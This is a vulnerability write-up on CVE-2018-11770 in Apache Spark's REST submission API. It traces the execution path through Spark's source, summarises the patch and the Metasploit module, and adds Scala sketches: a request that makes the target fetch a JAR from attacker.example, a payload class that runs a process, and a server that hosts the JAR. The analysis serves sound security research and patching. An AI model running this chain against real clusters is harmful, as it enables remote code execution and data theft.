Apache Spark CreateSubmissionRequest Vulnerability

Originally created by UC Berkeley's AMPLab, Apache Spark is an open-source cluster-computing framework that has since been maintained by the Apache Software Foundation. Mostly written in Scala, it is designed to be a fast, unified analytics engine for large-scale data, and it is used and invested in by many high-profile, large-scale companies.

Discovered by Chinese researcher Fengwei Zhang (of the Alibaba Cloud Security Team), the CreateSubmissionRequest REST API can be abused in standalone mode to allow users to submit malicious code, resulting in remote code execution. A Metasploit module was submitted on November 12, 2018, and this is how our analysis began.

According to Apache Spark's security issue list, this vulnerability is referred to as CVE-2018-11770.

Vulnerable Application

According to the vendor, the affected configurations are versions from 1.3.0 onward running a standalone master with the REST API enabled, or running a Mesos master with cluster mode enabled.

For testing purposes, the vulnerable version of Apache Spark can be installed as a Docker container by performing the following:

$ git clone https://github.com/vulhub/vulhub
$ cd vulhub/spark/unacc
$ docker-compose up -d

For manual installation, a walkthrough for the Windows version can be found here.
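With either setup, you can quickly confirm the target is reachable. Assuming the compose file maps the default ports, the standalone master's web UI listens on port 8080 and the REST submission server on port 6066. A throwaway check might look like the following sketch (host and ports are assumptions, adjust as needed):

import scala.io.Source

// Quick sanity check against a local test instance: the standalone master's
// web UI listens on port 8080 by default; the REST submission server that this
// analysis targets listens on port 6066.
object CheckTarget {
  def main(args: Array[String]): Unit = {
    val ui = Source.fromURL("http://localhost:8080").mkString
    println(if (ui.contains("Spark Master")) "Standalone master UI is up" else "Unexpected response")
  }
}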

Vendor Patching

The Apache Spark release notes indicate that the vulnerability was patched in version 2.4.0, tracked in Jira as [SPARK-25088]. The pull request can be found as #22071, and it makes the following changes:

  • The REST submission server is disabled by default in standalone mode.
  • The standalone master fails to start if the REST server is enabled and an authentication secret is set.
  • The Mesos cluster dispatcher fails to start if an authentication secret is set.
  • When submitting a standalone application, REST submission is only tried first if spark.master.rest.enabled=true (in the config file).

Review Details

Since Apache Spark is quite well documented (release notes, Jira tickets, pull requests, etc.), it doesn't take very long to identify from the patch the code responsible for the insecure submission: the StandaloneRestServer class.

The Starting Point: Abstract RestSubmissionServer

The StandaloneRestServer class actually extends the abstract RestSubmissionServer class, so we need to take a look at that first. At the beginning of this class, we can see how the URLs are mapped:

protected val baseContext = s"/${RestSubmissionServer.PROTOCOL_VERSION}/submissions"
protected lazy val contextToServlet = Map[String, RestServlet](
    s"$baseContext/create/*" -> submitRequestServlet,
    s"$baseContext/kill/*" -> killRequestServlet,
    s"$baseContext/status/*" -> statusRequestServlet,
    "/*" -> new ErrorServlet // default handler
)

The above tells us that a request to a path of this form (served on the REST port, 6066 by default) is routed to the submitRequestServlet class:

/v1/submissions/create

Inside the submitRequestServlet class, there is a doPost function:

protected override def doPost(
    requestServlet: HttpServletRequest,
    responseServlet: HttpServletResponse): Unit = {
    val responseMessage =
    try {
        val requestMessageJson = Source.fromInputStream(requestServlet.getInputStream).mkString
        val requestMessage = SubmitRestProtocolMessage.fromJson(requestMessageJson)
        // The response should have already been validated on the client.
        // In case this is not true, validate it ourselves to avoid potential NPEs.
        requestMessage.validate()
        handleSubmit(requestMessageJson, requestMessage, responseServlet)
    } catch {
        // The client failed to provide a valid JSON, so this is not our fault
        case e @ (_: JsonProcessingException | _: SubmitRestProtocolException) =>
        responseServlet.setStatus(HttpServletResponse.SC_BAD_REQUEST)
        handleError("Malformed request: " + formatException(e))
    }
    sendResponse(responseMessage, responseServlet)
}

Basically, this reads the raw JSON from the request stream, deserializes it into a SubmitRestProtocolMessage (the action field in the JSON determines the concrete message type), validates it, and then passes it to a handleSubmit function. Whoever extends RestSubmissionServer has to implement handleSubmit.

StandaloneRestServer

Now that we have a basic understanding of the abstract class, we can look at the subclasses. StandaloneRestServer is one of those that extends RestSubmissionServer, and it fits the description of the problem.

private[deploy] class StandaloneRestServer(
    host: String,
    requestedPort: Int,
    masterConf: SparkConf,
    masterEndpoint: RpcEndpointRef,
    masterUrl: String)
  extends RestSubmissionServer(host, requestedPort, masterConf) 

It's also very easy to identify what we should be looking at because of this line in the code:

protected override val submitRequestServlet =
new StandaloneSubmitRequestServlet(masterEndpoint, masterUrl, masterConf)

In StandaloneSubmitRequestServlet, we find the handleSubmit code we need:

protected override def handleSubmit(
    requestMessageJson: String,
    requestMessage: SubmitRestProtocolMessage,
    responseServlet: HttpServletResponse): SubmitRestProtocolResponse = {
    requestMessage match {
        case submitRequest: CreateSubmissionRequest =>
        val driverDescription = buildDriverDescription(submitRequest)
        val response = masterEndpoint.askSync[DeployMessages.SubmitDriverResponse](
            DeployMessages.RequestSubmitDriver(driverDescription))
        val submitResponse = new CreateSubmissionResponse
        submitResponse.serverSparkVersion = sparkVersion
        submitResponse.message = response.message
        submitResponse.success = response.success
        submitResponse.submissionId = response.driverId.orNull
        val unknownFields = findUnknownFields(requestMessageJson, requestMessage)
        if (unknownFields.nonEmpty) {
            // If there are fields that the server does not know about, warn the client
            submitResponse.unknownFields = unknownFields
        }
        submitResponse
        case unexpected =>
        responseServlet.setStatus(HttpServletResponse.SC_BAD_REQUEST)
        handleError(s"Received message of unexpected type ${unexpected.messageType}.")
    }
}

The buildDriverDescription Call in handleSubmit

Looking at the code, the buildDriverDescription function seems a little interesting. First off, it reveals what the appResource parameter means. The function is a bit too large to post here in full; basically, it starts off this way:

val appResource = Option(request.appResource).getOrElse {
    throw new SubmitRestMissingFieldException("Application jar is missing.")
}

And then it is passed to DriverDescription toward the end of the function:

new DriverDescription(appResource, actualDriverMemory, actualDriverCores, actualSuperviseDriver, command)

When we look at the DriverDescription class, we understand appResource's purpose: it is a URL to a JAR file:

private[deploy] case class DriverDescription(
    jarUrl: String,
    mem: Int,
    cores: Int,
    supervise: Boolean,
    command: Command)

At this point, it's clear that when we create a submission request, we can point the server at a remote JAR, which pretty much dictates the attack vector.
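To make the attack vector concrete, here is a minimal sketch of a raw submission request built with nothing but JDK classes. The target host, port, attacker-hosted JAR URL, and Evil main class are all hypothetical placeholders; the field names mirror what CreateSubmissionRequest expects:

import java.net.{HttpURLConnection, URL}
import java.nio.charset.StandardCharsets
import scala.io.Source

// Sketch of a raw CreateSubmissionRequest POSTed to the REST submission server.
// target.example, attacker.example, evil.jar, and Evil are placeholders.
object SubmitSketch {
  def main(args: Array[String]): Unit = {
    val json =
      """{
        |  "action": "CreateSubmissionRequest",
        |  "clientSparkVersion": "2.3.1",
        |  "appResource": "http://attacker.example:8000/evil.jar",
        |  "mainClass": "Evil",
        |  "appArgs": [],
        |  "environmentVariables": { "SPARK_ENV_LOADED": "1" },
        |  "sparkProperties": {
        |    "spark.master": "spark://target.example:6066",
        |    "spark.app.name": "Evil",
        |    "spark.submit.deployMode": "cluster",
        |    "spark.jars": "http://attacker.example:8000/evil.jar",
        |    "spark.driver.supervise": "false"
        |  }
        |}""".stripMargin

    val conn = new URL("http://target.example:6066/v1/submissions/create")
      .openConnection().asInstanceOf[HttpURLConnection]
    conn.setRequestMethod("POST")
    conn.setRequestProperty("Content-Type", "application/json;charset=UTF-8")
    conn.setDoOutput(true)
    val out = conn.getOutputStream
    out.write(json.getBytes(StandardCharsets.UTF_8))
    out.close()

    // On success, the master replies with a CreateSubmissionResponse containing a submissionId.
    println(Source.fromInputStream(conn.getInputStream).mkString)
  }
}

Note how appResource maps directly onto the jarUrl field of the DriverDescription shown above.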

Going back to the buildDriverDescription function, it also gives us clues about how the JAR is launched:

val command = new Command(
      "org.apache.spark.deploy.worker.DriverWrapper",
      Seq("{{WORKER_URL}}", "{{USER_JAR}}", mainClass) ++ appArgs,
      environmentVariables, extraClassPath, extraLibraryPath, javaOpts)

The Command class is defined as follows:

private[spark] case class Command(
    mainClass: String,
    arguments: Seq[String],
    environment: Map[String, String],
    classPathEntries: Seq[String],
    libraryPathEntries: Seq[String],
    javaOpts: Seq[String]) {
}

We see that the first argument is the main class, in this case org.apache.spark.deploy.worker.DriverWrapper, whose job is basically to invoke our main method:

val clazz = Utils.classForName(mainClass)
val mainMethod = clazz.getMethod("main", classOf[Array[String]])
mainMethod.invoke(null, extraArgs.toArray[String])
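In other words, whatever class is named as mainClass in the submission request gets its main method invoked on a worker. Purely for illustration (the class name and the command it runs are hypothetical), the payload class inside the submitted JAR could be as simple as:

// Hypothetical payload class referenced as "mainClass" in the submission request.
// DriverWrapper loads it from the downloaded JAR and invokes main() via reflection,
// so anything in here runs with the privileges of the worker process.
object Evil {
  def main(args: Array[String]): Unit = {
    // For example, spawn a process on the worker host.
    new ProcessBuilder("id").inheritIO().start().waitFor()
  }
}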

After the driver description is crafted, it is sent to the master endpoint wrapped in a RequestSubmitDriver message:

val response = masterEndpoint.askSync[DeployMessages.SubmitDriverResponse](DeployMessages.RequestSubmitDriver(driverDescription))

RequestSubmitDriver

The handling of RequestSubmitDriver can be found in the receiveAndReply function in Master.scala:

... code ...

case RequestSubmitDriver(description) =>
if (state != RecoveryState.ALIVE) {
    val msg = s"${Utils.BACKUP_STANDALONE_MASTER_PREFIX}: $state. " +
    "Can only accept driver submissions in ALIVE state."
    context.reply(SubmitDriverResponse(self, false, None, msg))
} else {
    logInfo("Driver submitted " + description.command.mainClass)
    val driver = createDriver(description)
    persistenceEngine.addDriver(driver)
    waitingDrivers += driver
    drivers.add(driver)
    schedule()
    
... code ...

In the else block, we can see that a driver built from our description is added to the collections of waiting and known drivers, and then schedule() is called. Let's take a look at what that does:

private def schedule(): Unit = {
    if (state != RecoveryState.ALIVE) {
        return
    }
    val shuffledAliveWorkers = Random.shuffle(workers.toSeq.filter(_.state == WorkerState.ALIVE))
    val numWorkersAlive = shuffledAliveWorkers.size
    var curPos = 0
    for (driver <- waitingDrivers.toList) {
        var launched = false
        var numWorkersVisited = 0
        while (numWorkersVisited < numWorkersAlive && !launched) {
            val worker = shuffledAliveWorkers(curPos)
            numWorkersVisited += 1
            if (worker.memoryFree >= driver.desc.mem && worker.coresFree >= driver.desc.cores) {
                launchDriver(worker, driver)
                waitingDrivers -= driver
                launched = true
            }
            curPos = (curPos + 1) % numWorkersAlive
        }
    }
    startExecutorsOnWorkers()
}

Notice that this function calls something called launchDriver, which sounds interesting. Let's keep looking:

private def launchDriver(worker: WorkerInfo, driver: DriverInfo) {
    logInfo("Launching driver " + driver.id + " on worker " + worker.id)
    worker.addDriver(driver)
    driver.worker = Some(worker)
    worker.endpoint.send(LaunchDriver(driver.id, driver.desc))
    driver.state = DriverState.RUNNING
}

So the code basically relies on the Worker class to launch the driver, and we can find this in Worker.scala:

    case LaunchDriver(driverId, driverDesc) =>
      logInfo(s"Asked to launch driver $driverId")
      val driver = new DriverRunner(
        conf,
        driverId,
        workDir,
        sparkHome,
        driverDesc.copy(command = Worker.maybeUpdateSSLSettings(driverDesc.command, conf)),
        self,
        workerUri,
        securityMgr)
      drivers(driverId) = driver
      driver.start()

Oh, I wonder what driver.start() does. Since this is from a DriverRunner instance, that's where we find the code.

DriverRunner

The purpose of DriverRunner is pretty self-explanatory, so it needs no introduction.

The Worker class tells us we should be looking at the start() function, but there is a lot of code for process setup and handling, so let's go straight to the point. Tracing from start() leads to this path:

start() -> prepareAndRunDriver() -> runDriver() -> runCommandWithRetry()

The runCommandWithRetry function finally executes our code using ProcessBuilder:

private[worker] def runCommandWithRetry(
    command: ProcessBuilderLike, initialize: Process => Unit, supervise: Boolean): Int = {
      
.... code ...

synchronized {
        if (killed) { return exitCode }
        process = Some(command.start())
        initialize(process.get)
      }
    
... code ...

Now that we have found the code that executes our payload, we have a complete picture of the execution flow, which concludes the analysis.

Metasploit Module

In order to exploit this, the Metasploit module relies on two mixins: HttpClient and HttpServer. These two mixins can be tricky to combine, but luckily there is a write-up explaining how to use them together, which can be found here.

The HttpServer mixin is used to host the payload, and the HttpClient mixin sends a submission request to Apache Spark's REST API server, instructing it to download the payload. The exploit is quite reliable, since it abuses a feature rather than some kind of memory corruption, but the module can leave quite a few artifacts on the target system. The most obvious one is the malicious driver, which is visible in the master GUI.
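For a rough, Metasploit-free picture of that flow, the "host the payload" half can be sketched with the JDK's built-in HTTP server; the port and JAR path below are assumptions, and the "send the submission" half is the raw request sketched earlier:

import com.sun.net.httpserver.{HttpExchange, HttpHandler, HttpServer}
import java.net.InetSocketAddress
import java.nio.file.{Files, Paths}

// Serve a prebuilt JAR over HTTP so the appResource URL in the submission
// request can point at it. The port and the JAR path are placeholders.
object ServeJarSketch {
  def main(args: Array[String]): Unit = {
    val jarBytes = Files.readAllBytes(Paths.get("/tmp/evil.jar"))
    val server = HttpServer.create(new InetSocketAddress(8000), 0)
    server.createContext("/evil.jar", new HttpHandler {
      override def handle(exchange: HttpExchange): Unit = {
        exchange.getResponseHeaders.add("Content-Type", "application/java-archive")
        exchange.sendResponseHeaders(200, jarBytes.length.toLong)
        exchange.getResponseBody.write(jarBytes)
        exchange.close()
      }
    })
    server.start() // the submission's appResource would point at http://<this host>:8000/evil.jar
  }
}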

Metasploit has a soft policy that prefers modules to use randomness wherever they can, for example randomizing the payload name, path, padding, etc. However, in this case the randomness actually makes the payload stand out on the master GUI list, which makes the soft policy somewhat debatable.

Summary

Although we're here to audit a vulnerability in Apache Spark, that doesn't make us think less of the product. In fact, it's quite the opposite: Apache Spark displays a lot of good software development habits that other projects should follow. Throughout the review process, we noticed that:

  • Apache Spark's release notes are well written, and link to references.
  • They use Jira for tracking tickets, and when there is a pull request, the PR # is attached to the ticket.
  • Developers take the time to write good descriptions for pull requests and make sure reviewers can understand them. This is really refreshing, because too many developers are too lazy to do this. PR titles are also properly labeled with the Jira ticket #.
  • Someone always reviews the code before it is merged.
  • Comments can be seen throughout the codebase.
  • Tons of documentation.

As for the CreateSubmissionRequest REST API, this is technically a feature, not exactly a bug. But because it was enabled by default and not carefully documented, it became an over-powered feature that attackers could reliably abuse as a vulnerability. In the real world, Apache Spark tends to be used with a lot of data behind it, so companies definitely cannot afford to have this problem hanging around their network.
